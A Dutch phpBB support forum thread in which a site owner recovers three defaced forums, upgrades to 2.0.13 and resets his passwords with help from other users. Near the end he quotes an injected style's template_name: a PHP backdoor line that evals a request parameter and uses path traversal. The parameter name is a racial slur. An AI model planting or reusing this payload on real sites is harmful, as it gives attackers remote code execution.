Hoe moet ik upgraden als mijn site gehackt is?

[Coen_2]

Alledrie mijn forums zijn door een hacker van uiterlijk veranderd. Header en Footer zijn het zelfde gebleven maar de Body en de Background zijn veranderd. Body's en background had ik zelf aangepast op basis van SubSilver. Ze zijn gemaakt in versie 2.0.10.

Ik heb een paar vragen over upgraden:
1. Moet ik eerst het 'werk' van de hacker ongedaan zien te maken en daarna upgraden? Of kan ik eerst upgraden en daarna het 'werk' van de hacker ongedaan maken? Of wordt het forum door de upgrade automatisch hersteld?
2. Kan ik rechtstreeks upgraden van 2.0.10 naar 2.0.13? Of moet ik eerst 11 en daarna 12 en 13 installeren?
3. Moet ik dan de gewijzigde bestanden of de patch bestanden downloaden? Wat is eigenlijk het verschil?
4. Hoe weet ik dat mijn zelfgemaakte aanpassingen aan body en background niet verloren zullen gaan na upgrades?

Nog een extra probleem:
Bij het forum van http://www.verpleegpost.nl heb ik geprobeerd via de Algemene Board Instellingen aan de Standaard Stijl te morrelen (ik koos de lege select) met als gevolg deze error:

Warning: message_die(./language/lang_english/lang_main.php) [function.message-die]: failed to open stream: No such file or directory in d:\www\verpleegpost.nl\www\phpBB2\includes\functions.php on line 656

Warning: message_die() [function.include]: Failed opening './language/lang_english/lang_main.php' for inclusion (include_path='.;C:/php5/PEAR') in d:\www\verpleegpost.nl\www\phpBB2\includes\functions.php on line 656
phpBB : Fatale Fout

Could not open template config file

DEBUG MODE

Line : 327
File : d:\www\verpleegpost.nl\www\phpBB2\includes\functions.php

Ik ga zo snel mogelijk de drie forums upgraden. Maar ik vermoed dat ik eerst bij dit ene forum van deze foutboodschap af moet. Wie weet hoe ik dit forum weer aan de praat krijg?

[mosymuis]

1. Moet ik eerst het 'werk' van de hacker ongedaan zien te maken en daarna upgraden? Of kan ik eerst upgraden en daarna het 'werk' van de hacker ongedaan maken? Of wordt het forum door de upgrade automatisch hersteld?

Kan allebei, al is het mij onduidelijk wat die hacker nu precies bij je gedaan heeft. nadat je klaar bent moet je zoiezo álle wachtwoorden aanpassen (cp, ftp, db en admin accounts).

2. Kan ik rechtstreeks upgraden van 2.0.10 naar 2.0.13? Of moet ik eerst 11 en daarna 12 en 13 installeren?

Dat ligt er aan, als je veel modificaties hebt geïnstalleerd en deze wilt behouden, moet je handmatig drie updates doorvoeren. Anders kan je gewoon de nieuwe bestanden 2.0.13 downloaden en vervangen op je server.

3. Moet ik dan de gewijzigde bestanden of de patch bestanden downloaden? Wat is eigenlijk het verschil?

De patch is een automatische update als je op een UNIX server op de shell kunt werken, bijvoorbeeld via SSH. Anders ben je aangewezen op de gewijzigde bestanden of complete download.

4. Hoe weet ik dat mijn zelfgemaakte aanpassingen aan body en background niet verloren zullen gaan na upgrades?

Als het goed is heb je die wijzigingen in de template bestanden aangebracht, en heb je deze als backup op je harde schijf staan. Als je klaar bent met updaten kan je deze paar template bestanden opnieuw uploaden.

[Coen_2]

Hoe en wat die hacker gedaan heeft is mij ook nog niet duidelijk. Als je een beetje door de B-verpleegpost heenklikt dan zie je meteen dat de forumpagina er anders uitziet dan de rest. Dat was dus niet zo. Wat ik nu zie is dat de achtergrondkleur van het middengedeelte wit is geworden (was camelkleurig, net als in de header en de footer) en dat de achtergrondkleur van de gehele pagina grijs is geworden (was blauw). Het zijn eigenlijk maar een paar kleine veranderingen, maar ze vallen wel heel erg op.

De foutmelding op dat ene forum (Verpleegpost) heb ik zelf veroorzaakt toen ik de oorzaak wilde zoeken. Maar daar kan ik nu dus niet meer inloggen. Bij die andere twee durf ik nu niet eens meer in te loggen, uit angst dat inloggen alleen al voldoende is om ook bij de andere sites die foutmelding te geven. Al met al behoorlijk shit.

[mosymuis]

Heb je een backup, met daarin de tabel phpbb_themes? Zo ja, zet die dan terug.

[Coen_2]

Nee, ik heb geen backup.

Ik heb in de Algemene Board Instellingen aan de Standaard Stijl zitten morrelen. Ik kon kiezen uit: -leeg- , subSilver en FI Black.
Ik koos de lege select met als gevolg de genoemde error. Inmiddels geloof ik dat ik het op subSilver had moeten laten staan omdat ik eigenlijk een aangepaste subSilver heb.
Als ik maar kon inloggen, dan zou ik het kunnen terugzetten ...

[Paul]

ga naar je database, zoek iets met default theme en zet die op 1 in de phpbb_config tabel

[Coen_2]

Eindelijk heb ik phpMyAdmin aan de praat gekregen en 'default_style' in de phpbb_config tabel kunnen wijzigen. Het werkt! Mijn grootste probleem is nu opgelost. Bedankt, Paulus. Geweldig!!!
Nu ga ik boel rustig de boel updaten ...

[Coen_2]

Mosymuis, je schreef:

nadat je klaar bent moet je zoiezo álle wachtwoorden aanpassen (cp, ftp, db en admin accounts)

Hoe verander ik de 'cp'en 'db' wachtwoorden?

Nadat ik met succes update_to_latest.php had gedraaid kreeg ik dit advies:

Please make sure you have updated your board files too, this file is only updating your database.

Hoe doe ik dat? Mijn board files updaten?

[mosymuis]

Hoe verander ik de 'cp'en 'db' wachtwoorden?

cp = control panel; db = database. Die wachtwoorden verander je in het gereedschap dat je van je host hebt gekregen om je server account te beheren, zoals Plesk, Ensim, DirectAdmin of cPanel.

Hoe doe ik dat? Mijn board files updaten?

Lees mijn antwoorden op je topic vragen #2 en #3 nog eens.

[Coen_2]

Aan de host kant heb ik alle wachtwoorden gewijzigd.
Ik neem aan dat met 'board files' onder andere de files bedoeld worden die ik zelf gedeeltelijk heb aangepast met andere kleuren (en door de hacker zijn gehacked).
Morgen ga ik eens kijken of ik mijn oorspronkelijke kleuren terug kan krijgen. Hopelijk kom ik er verder zelf uit.
Heel erg bedankt voor je raad, mosymuis!!

[mosymuis]

Ik neem aan dat met 'board files' onder andere de files bedoeld worden die ik zelf gedeeltelijk heb aangepast met andere kleuren (en door de hacker zijn gehacked).

De bestanden die je moet vervangen om up te daten naar .13 zijn aanwezig in de zips op phpBB.com, dit zijn niet je zelf aangepaste template bestanden.

[Coen_2]

Die heb ik uiteraard geupload. Daarna heb update_to_latest.php gedraaid en kreeg ik deze resultaten terug:

Information
Database type :: mysql
Previous version :: 2.0.10
Updated version :: 2.0.13
Updating database schema
Progress :: No updates required
Updating data
Progress :: No updates where required
Updating version and optimizing tables
Progress :: . . Done
Result :: No errors
Update completed
Please make sure you have updated your board files too, this file is only updating your database.

[mosymuis]

De bestanden die je moet vervangen om up te daten naar .13 zijn aanwezig in de zips op phpBB.com

Die heb ik uiteraard geupload.

Please make sure you have updated your board files too, this file is only updating your database.

Daarmee wordt hetzelfde bedoeld, dus dat is dan in orde.

[Coen_2]

Ondertussen heb ik in het forum van de Verpleegpost mijn oude kleuren terug Ik heb ze teruggekregen door subSilver te bewerken vanuit het Administratiepaneel (Stijlen Beheer). Toen ik destijds het forum maakte heb ik het ook op die manier gedaan.

Ik zie nu in dat de ongewenste veranderingen in mijn board niets anders waren dan een terugkeer naar de standaard waarden van subSilver. Ik begrijp nog niet hoe een hacker precies mijn wijzigingen in subSilver ongedaan heeft willen maken en de standaard instelligen van subSilver daarvoor heeft teruggezet. Dat lijkt me nl. te bewerkelijk als je dat bij veel boards wilt doen. Zou er toch iets anders zijn gebeurd dan een hacker? Wel vreemd dat het bij al mijn boards is gebeurd.

Vreemd is ook dat ik bij alledrie een NULL-stijl en de stijl FI Black aantrof. Die waren er voorheen niet. FI Black had bovendien deze code als 'template_name':

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

Beide vreemde stijlen heb ik verwijderd, op zich maakte dat geen verschil. Misschien toch onnavolgbaar hackwerk?